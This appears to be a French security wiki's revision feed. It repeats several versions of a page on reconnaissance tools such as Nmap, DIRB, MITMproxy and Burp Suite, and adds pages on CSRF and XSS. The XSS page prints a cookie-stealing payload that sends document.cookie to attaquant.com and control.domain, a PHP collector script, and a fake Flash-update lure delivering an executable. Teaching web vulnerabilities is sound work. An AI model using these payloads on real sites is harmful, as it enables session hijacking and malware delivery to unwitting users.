DIRB peut également être utilisé comme un scanner CGI classique, mais n'oubliez pas qu'il s'agit d'un scanner de contenu et non d'un scanner de vulnérabilité.

L'objectif principal de DIRB est d'aider à l'audit professionnel d'applications web, en particulier pour les tests liés à la sécurité. Il couvre certaines failles qui ne sont pas couvertes par les scanners classiques de vulnérabilités web.

DIRB recherche des objets web spécifiques que les autres scanners CGI génériques ne peuvent pas rechercher. Il ne recherche pas les vulnérabilités, ni les contenus web susceptibles d'être vulnérables.

$ dirb http://localhost -z 250

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 2 13:54:11 2023
URL_BASE: http://localhost/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://localhost/ ----
> Testing: http://localhost/.hta

$ man dirb

= CMSEEK =
Il analyse WordPress, Joomla, Drupal et plus de 180 autres CMS.

Un système de gestion de contenu (content management system (CMS)) gère la création et la modification de contenu numérique. Il prend généralement en charge plusieurs utilisateurs dans un environnement collaboratif.

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
WPScan analyse les installations WordPress à distance pour détecter les problèmes de sécurité.

= Dorking =

= MITMproxy =
MITMproxy est un proxy HTTP man-in-the-middle compatible SSL. Il fournit une interface console qui permet d'inspecter et d'éditer les flux de trafic à la volée.

MITMdump est la version en ligne de commande de MITMproxy, et est livrée avec les mêmes fonctionnalités, mais sans fioritures.

Caractéristiques :
*Intercepte et modifie le trafic HTTP à la volée
*Sauvegarde des conversations HTTP pour une relecture et une analyse ultérieures
*Rejoue à la fois les requêtes HTTP clients et serveurs
*Modification par script du trafic HTTP à l'aide de Python
*Certificats d'interception SSL sont générés à la volée.

$ mitmproxy

$ mitmproxy -h

= OWASP ZAP =
Le Zed Attack Proxy (ZAP) de OWASP est un outil de test de pénétration intégré pour trouver les vulnérabilités dans les applications web.

Il est conçu pour être utilisé par des personnes ayant une expérience variée en matière de sécurité et est donc idéal pour les développeurs et les testeurs qui débutent dans les tests de pénétration, tout en étant un complément utile à la boîte à outils d'un testeur expérimenté.

= Burp Suite =
Burp Suite est une plateforme intégrée permettant de tester la sécurité des applications web. Ses différents outils fonctionnent de manière transparente pour soutenir l'ensemble du processus de test, depuis la cartographie et l'analyse initiales de la surface d'attaque d'une application jusqu'à la recherche et l'exploitation des vulnérabilités de sécurité.

Hacking:Recherche d'information sur cible

2023-12-02T15:46:58Z

OldNeib : /* OWASP ZAP */

= Nmap =
Nmap est un utilitaire pour l'exploration de réseau et l'audit de sécurité. Il supporte le balayage ping (déterminer quels hôtes sont allumés), de nombreuses techniques de balayage de ports, la détection de version (déterminer les protocoles de services et les versions d'applications qui écoutent derrière ces ports) et les empreintes TCP/IP (identification du système d'exploitation ou du périphérique à distance).

Nmap offre aussi une spécification flexible de cible et de port, le balayage avec diversion ou furtif, le balayage de RPC Sun... La plupart des plate-formes Unix et Windows sont supportées en mode graphique et ligne de commande. Plusieurs périphériques portables populaires sont aussi supportés dont le Sharp Zaurus et le iPAQ.

$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap

$ nmap -h

= Dirb =
DIRB est un scanneur de contenu web. Il recherche les objets Web existants (et/ou cachés). Il fonctionne essentiellement en lançant une attaque basée sur un dictionnaire contre un serveur web et en analysant les réponses.

DIRB est livré avec un ensemble de listes de mots d'attaque préconfigurées pour une utilisation facile, mais vous pouvez utiliser vos propres listes de mots.

DIRB peut également être utilisé comme un scanner CGI classique, mais n'oubliez pas qu'il s'agit d'un scanner de contenu et non d'un scanner de vulnérabilité.

L'objectif principal de DIRB est d'aider à l'audit professionnel d'applications web, en particulier pour les tests liés à la sécurité. Il couvre certaines failles qui ne sont pas couvertes par les scanners classiques de vulnérabilités web.

DIRB recherche des objets web spécifiques que les autres scanners CGI génériques ne peuvent pas rechercher. Il ne recherche pas les vulnérabilités, ni les contenus web susceptibles d'être vulnérables.

$ dirb http://localhost -z 250

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 2 13:54:11 2023
URL_BASE: http://localhost/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://localhost/ ----
> Testing: http://localhost/.hta

$ man dirb

= CMSEEK =
Il analyse WordPress, Joomla, Drupal et plus de 180 autres CMS.

Un système de gestion de contenu (content management system (CMS)) gère la création et la modification de contenu numérique. Il prend généralement en charge plusieurs utilisateurs dans un environnement collaboratif.

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
WPScan analyse les installations WordPress à distance pour détecter les problèmes de sécurité.

= Dorking =

= MITMproxy =
MITMproxy est un proxy HTTP man-in-the-middle compatible SSL. Il fournit une interface console qui permet d'inspecter et d'éditer les flux de trafic à la volée.

MITMdump est la version en ligne de commande de MITMproxy, et est livrée avec les mêmes fonctionnalités, mais sans fioritures.

Caractéristiques :
*Intercepte et modifie le trafic HTTP à la volée
*Sauvegarde des conversations HTTP pour une relecture et une analyse ultérieures
*Rejoue à la fois les requêtes HTTP clients et serveurs
*Modification par script du trafic HTTP à l'aide de Python
*Certificats d'interception SSL sont générés à la volée.

$ mitmproxy

$ mitmproxy -h

= OWASP ZAP =
Le Zed Attack Proxy (ZAP) de OWASP est un outil de test de pénétration intégré pour trouver les vulnérabilités dans les applications web.

Il est conçu pour être utilisé par des personnes ayant une expérience variée en matière de sécurité et est donc idéal pour les développeurs et les testeurs qui débutent dans les tests de pénétration, tout en étant un complément utile à la boîte à outils d'un testeur expérimenté.

= Burp Suite =
Burp Suite est une plateforme intégrée permettant de tester la sécurité des applications web. Ses différents outils fonctionnent de manière transparente pour soutenir l'ensemble du processus de test, depuis la cartographie et l'analyse initiales de la surface d'attaque d'une application jusqu'à la recherche et l'exploitation des vulnérabilités de sécurité.

Hacking:Recherche d'information sur cible

2023-12-02T15:45:51Z

OldNeib : /* MITMproxy */

= Nmap =
Nmap est un utilitaire pour l'exploration de réseau et l'audit de sécurité. Il supporte le balayage ping (déterminer quels hôtes sont allumés), de nombreuses techniques de balayage de ports, la détection de version (déterminer les protocoles de services et les versions d'applications qui écoutent derrière ces ports) et les empreintes TCP/IP (identification du système d'exploitation ou du périphérique à distance).

Nmap offre aussi une spécification flexible de cible et de port, le balayage avec diversion ou furtif, le balayage de RPC Sun... La plupart des plate-formes Unix et Windows sont supportées en mode graphique et ligne de commande. Plusieurs périphériques portables populaires sont aussi supportés dont le Sharp Zaurus et le iPAQ.

$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap

$ nmap -h

= Dirb =
DIRB est un scanneur de contenu web. Il recherche les objets Web existants (et/ou cachés). Il fonctionne essentiellement en lançant une attaque basée sur un dictionnaire contre un serveur web et en analysant les réponses.

DIRB est livré avec un ensemble de listes de mots d'attaque préconfigurées pour une utilisation facile, mais vous pouvez utiliser vos propres listes de mots.

DIRB peut également être utilisé comme un scanner CGI classique, mais n'oubliez pas qu'il s'agit d'un scanner de contenu et non d'un scanner de vulnérabilité.

L'objectif principal de DIRB est d'aider à l'audit professionnel d'applications web, en particulier pour les tests liés à la sécurité. Il couvre certaines failles qui ne sont pas couvertes par les scanners classiques de vulnérabilités web.

DIRB recherche des objets web spécifiques que les autres scanners CGI génériques ne peuvent pas rechercher. Il ne recherche pas les vulnérabilités, ni les contenus web susceptibles d'être vulnérables.

$ dirb http://localhost -z 250

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 2 13:54:11 2023
URL_BASE: http://localhost/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://localhost/ ----
> Testing: http://localhost/.hta

$ man dirb

= CMSEEK =
Il analyse WordPress, Joomla, Drupal et plus de 180 autres CMS.

Un système de gestion de contenu (content management system (CMS)) gère la création et la modification de contenu numérique. Il prend généralement en charge plusieurs utilisateurs dans un environnement collaboratif.

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
WPScan analyse les installations WordPress à distance pour détecter les problèmes de sécurité.

= Dorking =

= MITMproxy =
MITMproxy est un proxy HTTP man-in-the-middle compatible SSL. Il fournit une interface console qui permet d'inspecter et d'éditer les flux de trafic à la volée.

MITMdump est la version en ligne de commande de MITMproxy, et est livrée avec les mêmes fonctionnalités, mais sans fioritures.

Caractéristiques :
*Intercepte et modifie le trafic HTTP à la volée
*Sauvegarde des conversations HTTP pour une relecture et une analyse ultérieures
*Rejoue à la fois les requêtes HTTP clients et serveurs
*Modification par script du trafic HTTP à l'aide de Python
*Certificats d'interception SSL sont générés à la volée.

$ mitmproxy

$ mitmproxy -h

= OWASP ZAP =
Le Zed Attack Proxy (ZAP) de OWASP est un outil de test de pénétration intégré et facile à utiliser pour trouver les vulnérabilités dans les applications web.

Il est conçu pour être utilisé par des personnes ayant une expérience variée en matière de sécurité et est donc idéal pour les développeurs et les testeurs fonctionnels qui débutent dans les tests de pénétration, tout en étant un complément utile à la boîte à outils d'un testeur expérimenté.

= Burp Suite =
Burp Suite est une plateforme intégrée permettant de tester la sécurité des applications web. Ses différents outils fonctionnent de manière transparente pour soutenir l'ensemble du processus de test, depuis la cartographie et l'analyse initiales de la surface d'attaque d'une application jusqu'à la recherche et l'exploitation des vulnérabilités de sécurité.

Hacking:Recherche d'information sur cible

2023-12-02T15:44:55Z

OldNeib : /* CMSEEK */

= Nmap =
Nmap est un utilitaire pour l'exploration de réseau et l'audit de sécurité. Il supporte le balayage ping (déterminer quels hôtes sont allumés), de nombreuses techniques de balayage de ports, la détection de version (déterminer les protocoles de services et les versions d'applications qui écoutent derrière ces ports) et les empreintes TCP/IP (identification du système d'exploitation ou du périphérique à distance).

Nmap offre aussi une spécification flexible de cible et de port, le balayage avec diversion ou furtif, le balayage de RPC Sun... La plupart des plate-formes Unix et Windows sont supportées en mode graphique et ligne de commande. Plusieurs périphériques portables populaires sont aussi supportés dont le Sharp Zaurus et le iPAQ.

$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap

$ nmap -h

= Dirb =
DIRB est un scanneur de contenu web. Il recherche les objets Web existants (et/ou cachés). Il fonctionne essentiellement en lançant une attaque basée sur un dictionnaire contre un serveur web et en analysant les réponses.

DIRB est livré avec un ensemble de listes de mots d'attaque préconfigurées pour une utilisation facile, mais vous pouvez utiliser vos propres listes de mots.

DIRB peut également être utilisé comme un scanner CGI classique, mais n'oubliez pas qu'il s'agit d'un scanner de contenu et non d'un scanner de vulnérabilité.

L'objectif principal de DIRB est d'aider à l'audit professionnel d'applications web, en particulier pour les tests liés à la sécurité. Il couvre certaines failles qui ne sont pas couvertes par les scanners classiques de vulnérabilités web.

DIRB recherche des objets web spécifiques que les autres scanners CGI génériques ne peuvent pas rechercher. Il ne recherche pas les vulnérabilités, ni les contenus web susceptibles d'être vulnérables.

$ dirb http://localhost -z 250

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 2 13:54:11 2023
URL_BASE: http://localhost/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://localhost/ ----
> Testing: http://localhost/.hta

$ man dirb

= CMSEEK =
Il analyse WordPress, Joomla, Drupal et plus de 180 autres CMS.

Un système de gestion de contenu (content management system (CMS)) gère la création et la modification de contenu numérique. Il prend généralement en charge plusieurs utilisateurs dans un environnement collaboratif.

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
WPScan analyse les installations WordPress à distance pour détecter les problèmes de sécurité.

= Dorking =

= MITMproxy =
MITMproxy est un proxy HTTP man-in-the-middle compatible SSL. Il fournit une interface console qui permet d'inspecter et d'éditer les flux de trafic à la volée.

MITMdump est la version en ligne de commande de MITMproxy, est livrée avec les mêmes fonctionnalités, mais sans fioritures.

Caractéristiques :
*Intercepte et modifie le trafic HTTP à la volée
*Sauvegarde des conversations HTTP pour une relecture et une analyse ultérieures
*Rejoue à la fois les requêtes HTTP clients et serveurs
*Modification par script du trafic HTTP à l'aide de Python
*Certificats d'interception SSL sont générés à la volée.

$ mitmproxy

$ mitmproxy -h

= OWASP ZAP =
Le Zed Attack Proxy (ZAP) de OWASP est un outil de test de pénétration intégré et facile à utiliser pour trouver les vulnérabilités dans les applications web.

Il est conçu pour être utilisé par des personnes ayant une expérience variée en matière de sécurité et est donc idéal pour les développeurs et les testeurs fonctionnels qui débutent dans les tests de pénétration, tout en étant un complément utile à la boîte à outils d'un testeur expérimenté.

= Burp Suite =
Burp Suite est une plateforme intégrée permettant de tester la sécurité des applications web. Ses différents outils fonctionnent de manière transparente pour soutenir l'ensemble du processus de test, depuis la cartographie et l'analyse initiales de la surface d'attaque d'une application jusqu'à la recherche et l'exploitation des vulnérabilités de sécurité.

Hacking:Recherche d'information sur cible

2023-12-02T15:44:25Z

OldNeib : /* CMSEEK */

= Nmap =
Nmap est un utilitaire pour l'exploration de réseau et l'audit de sécurité. Il supporte le balayage ping (déterminer quels hôtes sont allumés), de nombreuses techniques de balayage de ports, la détection de version (déterminer les protocoles de services et les versions d'applications qui écoutent derrière ces ports) et les empreintes TCP/IP (identification du système d'exploitation ou du périphérique à distance).

Nmap offre aussi une spécification flexible de cible et de port, le balayage avec diversion ou furtif, le balayage de RPC Sun... La plupart des plate-formes Unix et Windows sont supportées en mode graphique et ligne de commande. Plusieurs périphériques portables populaires sont aussi supportés dont le Sharp Zaurus et le iPAQ.

$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap

$ nmap -h

= Dirb =
DIRB est un scanneur de contenu web. Il recherche les objets Web existants (et/ou cachés). Il fonctionne essentiellement en lançant une attaque basée sur un dictionnaire contre un serveur web et en analysant les réponses.

DIRB est livré avec un ensemble de listes de mots d'attaque préconfigurées pour une utilisation facile, mais vous pouvez utiliser vos propres listes de mots.

DIRB peut également être utilisé comme un scanner CGI classique, mais n'oubliez pas qu'il s'agit d'un scanner de contenu et non d'un scanner de vulnérabilité.

L'objectif principal de DIRB est d'aider à l'audit professionnel d'applications web, en particulier pour les tests liés à la sécurité. Il couvre certaines failles qui ne sont pas couvertes par les scanners classiques de vulnérabilités web.

DIRB recherche des objets web spécifiques que les autres scanners CGI génériques ne peuvent pas rechercher. Il ne recherche pas les vulnérabilités, ni les contenus web susceptibles d'être vulnérables.

$ dirb http://localhost -z 250

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 2 13:54:11 2023
URL_BASE: http://localhost/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://localhost/ ----
> Testing: http://localhost/.hta

$ man dirb

= CMSEEK =
Il analyse WordPress, Joomla, Drupal et plus de 180 autres CMS.

Un système de gestion de contenu (content management system (CMS)) gère la création et la modification de contenu numérique. Il prend généralement en charge plusieurs utilisateurs dans un environnement collaboratif.

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
WPScan analyse les installations WordPress à distance pour détecter les problèmes de sécurité.

= Dorking =

= MITMproxy =
MITMproxy est un proxy HTTP man-in-the-middle compatible SSL. Il fournit une interface console qui permet d'inspecter et d'éditer les flux de trafic à la volée.

MITMdump est la version en ligne de commande de MITMproxy, est livrée avec les mêmes fonctionnalités, mais sans fioritures.

Caractéristiques :
*Intercepte et modifie le trafic HTTP à la volée
*Sauvegarde des conversations HTTP pour une relecture et une analyse ultérieures
*Rejoue à la fois les requêtes HTTP clients et serveurs
*Modification par script du trafic HTTP à l'aide de Python
*Certificats d'interception SSL sont générés à la volée.

$ mitmproxy

$ mitmproxy -h

= OWASP ZAP =
Le Zed Attack Proxy (ZAP) de OWASP est un outil de test de pénétration intégré et facile à utiliser pour trouver les vulnérabilités dans les applications web.

Il est conçu pour être utilisé par des personnes ayant une expérience variée en matière de sécurité et est donc idéal pour les développeurs et les testeurs fonctionnels qui débutent dans les tests de pénétration, tout en étant un complément utile à la boîte à outils d'un testeur expérimenté.

= Burp Suite =
Burp Suite est une plateforme intégrée permettant de tester la sécurité des applications web. Ses différents outils fonctionnent de manière transparente pour soutenir l'ensemble du processus de test, depuis la cartographie et l'analyse initiales de la surface d'attaque d'une application jusqu'à la recherche et l'exploitation des vulnérabilités de sécurité.

Web:Cross-Site Request Forgery - CSRF - XSRF

2023-12-02T15:42:36Z

OldNeib : /* Présentation */

= Présentation =
Le Cross-Site Request Forgery, abrégé CSRF ou XSRF, est un type de vulnérabilité des services d'authentification web.

L’objet de cette attaque est de transmettre à un utilisateur authentifié une requête HTTP falsifiée qui pointe sur une action interne au site, afin qu'il l'exécute sans en avoir conscience et en utilisant ses propres droits. L’utilisateur devient donc complice d’une attaque sans même s'en rendre compte. L'attaque étant actionnée par l'utilisateur, un grand nombre de systèmes d'authentification sont contournés.

Les caractéristiques du CSRF sont un type d'attaque qui :
*Implique un site qui repose sur l'authentification globale d'un utilisateur
*Exploite cette confiance dans l'authentification pour autoriser des actions implicitement
*Envoie des requêtes HTTP à l'insu de l'utilisateur qui est dupé pour déclencher ces actions

Les sites sensibles au CSRF sont ceux qui acceptent les actions sur le simple fait de l'authentification à un instant donné de l'utilisateur et non sur une autorisation explicite de l'utilisateur pour une action donnée.

Il est important de souligner que ces attaques peuvent aussi être menées sur des intranets pour permettre à un attaquant d'en récupérer des informations.

= Exploitation =
L'exploitation s'apparente à celle d'une [[Cross-Site_Scripting_-_XSS]].

Web:Cross-Site Request Forgery - CSRF - XSRF

2023-12-02T15:39:45Z

OldNeib : /* Exploitation */

= Présentation =
Le cross-site request forgery, abrégé CSRF ou XSRF, est un type de vulnérabilité des services d'authentification web.

L’objet de cette attaque est de transmettre à un utilisateur authentifié une requête HTTP falsifiée qui pointe sur une action interne au site, afin qu'il l'exécute sans en avoir conscience et en utilisant ses propres droits. L’utilisateur devient donc complice d’une attaque sans même s'en rendre compte. L'attaque étant actionnée par l'utilisateur, un grand nombre de systèmes d'authentification sont contournés.

Les caractéristiques du CSRF sont un type d'attaque qui :
*Implique un site qui repose sur l'authentification globale d'un utilisateur
*Exploite cette confiance dans l'authentification pour autoriser des actions implicitement
*Envoie des requêtes HTTP à l'insu de l'utilisateur qui est dupé pour déclencher ces actions

Les sites sensibles au CSRF sont ceux qui acceptent les actions sur le simple fait de l'authentification à un instant donné de l'utilisateur et non sur une autorisation explicite de l'utilisateur pour une action donnée.

Il est important de souligner que ces attaques peuvent aussi être menées sur des intranets pour permettre à un attaquant d'en récupérer des informations.

= Exploitation =
L'exploitation s'apparente à celle d'une [[Cross-Site_Scripting_-_XSS]].

Web:Cross-Site Scripting - XSS

2023-12-02T15:36:06Z

OldNeib : Neib a déplacé la page Cross-Site Scipting - XSS vers Cross-Site Scripting - XSS

= Présentation =
Cette vulnérabilité est possible lorsqu'une valeur qui peut être contrôlée par l'utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur.

Imaginons un site où il serait possible d'uploader une image. Nous envoyons donc une image avec comme nom: lapin.jpg et comme description: Oh! Trop mignon!.

La page retournée nous renverrait alors l'image sous la forme:

<img src="./lapin.jpg" title="Oh! Trop mignon!" />

Un cas classique d'exploitation serait de remplacer la description: Oh! Trop mignon! par: " /><script>alert('Hacked!');</script>.

Le site nous retournerait alors:

<img src="./lapin.jpg" title="" /><script>alert('Hacked!');</script>

Ce code HTML étant valide, notre JavaScript sera exécuté au sein du navigateur.

En se débrouillant pour faire afficher cette image à un autre utilisateur, le code s'exécutera cette fois ci dans son navigateur. Il est ainsi possible de récupérer certaines informations sensibles ou alors de faire exécuter quelque action depuis le navigateur de notre cible.

Ici, comme le code injecté est enregistré par le serveur via notre image, quiconque se rendra sur la page où notre image est enregistré se verra exécuter notre script.

= Éxploitation =
== Exemple de récupération de cookies ==
*Préparation du fichier getCookie.php. Celui-ci devra être enregistré de façon `pouvoir être consulté depuis le navigateur de notre cible.

<?php
$cookie = $_GET['v'] . "\n";
file_put_contents("cookies.txt", $cookie, FILE_APPEND | LOCK_EX);
?>

*La victime doit maintenant accéder à notre page:

" /><script>document.location="http://attaquant.com/getCookie.php?v=" + document.cookie;</script><script>document.location="http://control.domain/get.php?v=" + document.cookie;</script>

Une fois arrivé sur la page piégée, l'utilisateur sera redirigé vers notre page avec ses cookies en paramètre. Cookies qui seront enregistrés dans un fichier nommé cookie.txt

== Social Engineering ==
Un exemple d'attaque à adapter selon son imagination:
*Création d'un exécutable type [[Reverse Shell]] ou autre.
*Simulation d'un plugin manquant pour lire ou exécuter un contenu sur le navigateur de notre victime. Ex: "Pour continuer, Flash Player doit être mis à jour." + image utilisée lorsqu'un plugin est réellement manquant.
*Téléchargement de notre faux plugin par la victime, puis exécution.

" /> <a href="http://control.domain/flash_update.exe"><img src="http://control.domain/flash.png" /></a> <p alt="

= Cheat Sheet =
*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Web:Cross-Site Request Forgery - CSRF - XSRF

2023-12-02T15:35:40Z

OldNeib : Page créée avec « = Présentation = Le cross-site request forgery, abrégé CSRF ou XSRF, est un type de vulnérabilité des services d'authentification web. L’objet de cette attaque est de transmettre à un utilisateur authentifié une requête HTTP falsifiée qui pointe sur une action interne au site, afin qu'il l'exécute sans en avoir conscience et en utilisant ses propres droits. L’utilisateur devient donc complice d’une attaque sans même s'en rendre compte. L'attaque... »

Hacking:Recherche d'information sur cible

2023-12-02T15:18:02Z

OldNeib : /* Dirb */

= Nmap =
Nmap est un utilitaire pour l'exploration de réseau et l'audit de sécurité. Il supporte le balayage ping (déterminer quels hôtes sont allumés), de nombreuses techniques de balayage de ports, la détection de version (déterminer les protocoles de services et les versions d'applications qui écoutent derrière ces ports) et les empreintes TCP/IP (identification du système d'exploitation ou du périphérique à distance).

Nmap offre aussi une spécification flexible de cible et de port, le balayage avec diversion ou furtif, le balayage de RPC Sun... La plupart des plate-formes Unix et Windows sont supportées en mode graphique et ligne de commande. Plusieurs périphériques portables populaires sont aussi supportés dont le Sharp Zaurus et le iPAQ.

$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap

$ nmap -h

= Dirb =
DIRB est un scanneur de contenu web. Il recherche les objets Web existants (et/ou cachés). Il fonctionne essentiellement en lançant une attaque basée sur un dictionnaire contre un serveur web et en analysant les réponses.

DIRB est livré avec un ensemble de listes de mots d'attaque préconfigurées pour une utilisation facile, mais vous pouvez utiliser vos propres listes de mots.

DIRB peut également être utilisé comme un scanner CGI classique, mais n'oubliez pas qu'il s'agit d'un scanner de contenu et non d'un scanner de vulnérabilité.

L'objectif principal de DIRB est d'aider à l'audit professionnel d'applications web, en particulier pour les tests liés à la sécurité. Il couvre certaines failles qui ne sont pas couvertes par les scanners classiques de vulnérabilités web.

DIRB recherche des objets web spécifiques que les autres scanners CGI génériques ne peuvent pas rechercher. Il ne recherche pas les vulnérabilités, ni les contenus web susceptibles d'être vulnérables.

$ dirb http://localhost -z 250

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 2 13:54:11 2023
URL_BASE: http://localhost/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://localhost/ ----
> Testing: http://localhost/.hta

$ man dirb

= CMSEEK =
Il analyse WordPress, Joomla, Drupal et plus de 180 autres CMS.

Un système de gestion de contenu (content management system (CMS)) gère la création et la modification de contenu numérique. Il prend généralement en charge plusieurs utilisateurs dans un environnement collaboratif.

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
WPScan analyse les installations WordPress à distance pour détecter les problèmes de sécurité.

= Dorking =

= MITMproxy =
MITMproxy est un proxy HTTP man-in-the-middle compatible SSL. Il fournit une interface console qui permet d'inspecter et d'éditer les flux de trafic à la volée.

MITMdump est la version en ligne de commande de MITMproxy, est livrée avec les mêmes fonctionnalités, mais sans fioritures.

Caractéristiques :
*Intercepte et modifie le trafic HTTP à la volée
*Sauvegarde des conversations HTTP pour une relecture et une analyse ultérieures
*Rejoue à la fois les requêtes HTTP clients et serveurs
*Modification par script du trafic HTTP à l'aide de Python
*Certificats d'interception SSL sont générés à la volée.

$ mitmproxy

$ mitmproxy -h

= OWASP ZAP =
Le Zed Attack Proxy (ZAP) de OWASP est un outil de test de pénétration intégré et facile à utiliser pour trouver les vulnérabilités dans les applications web.

Il est conçu pour être utilisé par des personnes ayant une expérience variée en matière de sécurité et est donc idéal pour les développeurs et les testeurs fonctionnels qui débutent dans les tests de pénétration, tout en étant un complément utile à la boîte à outils d'un testeur expérimenté.

= Burp Suite =
Burp Suite est une plateforme intégrée permettant de tester la sécurité des applications web. Ses différents outils fonctionnent de manière transparente pour soutenir l'ensemble du processus de test, depuis la cartographie et l'analyse initiales de la surface d'attaque d'une application jusqu'à la recherche et l'exploitation des vulnérabilités de sécurité.

Hacking:Recherche d'information sur cible

2023-12-02T15:12:50Z

OldNeib : /* Nmap */

= Nmap =
Nmap est un utilitaire pour l'exploration de réseau et l'audit de sécurité. Il supporte le balayage ping (déterminer quels hôtes sont allumés), de nombreuses techniques de balayage de ports, la détection de version (déterminer les protocoles de services et les versions d'applications qui écoutent derrière ces ports) et les empreintes TCP/IP (identification du système d'exploitation ou du périphérique à distance).

Nmap offre aussi une spécification flexible de cible et de port, le balayage avec diversion ou furtif, le balayage de RPC Sun... La plupart des plate-formes Unix et Windows sont supportées en mode graphique et ligne de commande. Plusieurs périphériques portables populaires sont aussi supportés dont le Sharp Zaurus et le iPAQ.

$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap

$ nmap -h

= Dirb =
Dirb est un scanneur de contenu web, il va servir à énumérer des dossiers potentiellement présents sur une cible donnée.

$ dirb http://localhost -z 250

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 2 13:54:11 2023
URL_BASE: http://localhost/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://localhost/ ----
> Testing: http://localhost/.hta

$ man dirb

= CMSEEK =
Il analyse WordPress, Joomla, Drupal et plus de 180 autres CMS.

Un système de gestion de contenu (content management system (CMS)) gère la création et la modification de contenu numérique. Il prend généralement en charge plusieurs utilisateurs dans un environnement collaboratif.

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
WPScan analyse les installations WordPress à distance pour détecter les problèmes de sécurité.

= Dorking =

= MITMproxy =
MITMproxy est un proxy HTTP man-in-the-middle compatible SSL. Il fournit une interface console qui permet d'inspecter et d'éditer les flux de trafic à la volée.

MITMdump est la version en ligne de commande de MITMproxy, est livrée avec les mêmes fonctionnalités, mais sans fioritures.

Caractéristiques :
*Intercepte et modifie le trafic HTTP à la volée
*Sauvegarde des conversations HTTP pour une relecture et une analyse ultérieures
*Rejoue à la fois les requêtes HTTP clients et serveurs
*Modification par script du trafic HTTP à l'aide de Python
*Certificats d'interception SSL sont générés à la volée.

$ mitmproxy

$ mitmproxy -h

= OWASP ZAP =
Le Zed Attack Proxy (ZAP) de OWASP est un outil de test de pénétration intégré et facile à utiliser pour trouver les vulnérabilités dans les applications web.

Il est conçu pour être utilisé par des personnes ayant une expérience variée en matière de sécurité et est donc idéal pour les développeurs et les testeurs fonctionnels qui débutent dans les tests de pénétration, tout en étant un complément utile à la boîte à outils d'un testeur expérimenté.

= Burp Suite =
Burp Suite est une plateforme intégrée permettant de tester la sécurité des applications web. Ses différents outils fonctionnent de manière transparente pour soutenir l'ensemble du processus de test, depuis la cartographie et l'analyse initiales de la surface d'attaque d'une application jusqu'à la recherche et l'exploitation des vulnérabilités de sécurité.

Hacking:Recherche d'information sur cible

2023-12-02T14:53:30Z

OldNeib : /* Burp Suite */

= Nmap =
Nmap est un outil d'exploration réseau et un scanneur de ports.
$ nmap <domain|ip>

Beaucoup d'options sont disponibles, pour une liste complète:
$ man nmap

$ nmap -h

= Dirb =
Dirb est un scanneur de contenu web, il va servir à énumérer des dossiers potentiellement présents sur une cible donnée.

$ dirb http://localhost -z 250

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Dec 2 13:54:11 2023
URL_BASE: http://localhost/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
SPEED_DELAY: 250 milliseconds

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://localhost/ ----
> Testing: http://localhost/.hta

$ man dirb

= CMSEEK =
Il analyse WordPress, Joomla, Drupal et plus de 180 autres CMS.

Un système de gestion de contenu (content management system (CMS)) gère la création et la modification de contenu numérique. Il prend généralement en charge plusieurs utilisateurs dans un environnement collaboratif.

= Nikto =
nikto - Scan web server for known vulnerabilities

= WPScan =
WPScan analyse les installations WordPress à distance pour détecter les problèmes de sécurité.

= Dorking =

= MITMproxy =
MITMproxy est un proxy HTTP man-in-the-middle compatible SSL. Il fournit une interface console qui permet d'inspecter et d'éditer les flux de trafic à la volée.

MITMdump est la version en ligne de commande de MITMproxy, est livrée avec les mêmes fonctionnalités, mais sans fioritures.

Caractéristiques :
*Intercepte et modifie le trafic HTTP à la volée
*Sauvegarde des conversations HTTP pour une relecture et une analyse ultérieures
*Rejoue à la fois les requêtes HTTP clients et serveurs
*Modification par script du trafic HTTP à l'aide de Python
*Certificats d'interception SSL sont générés à la volée.

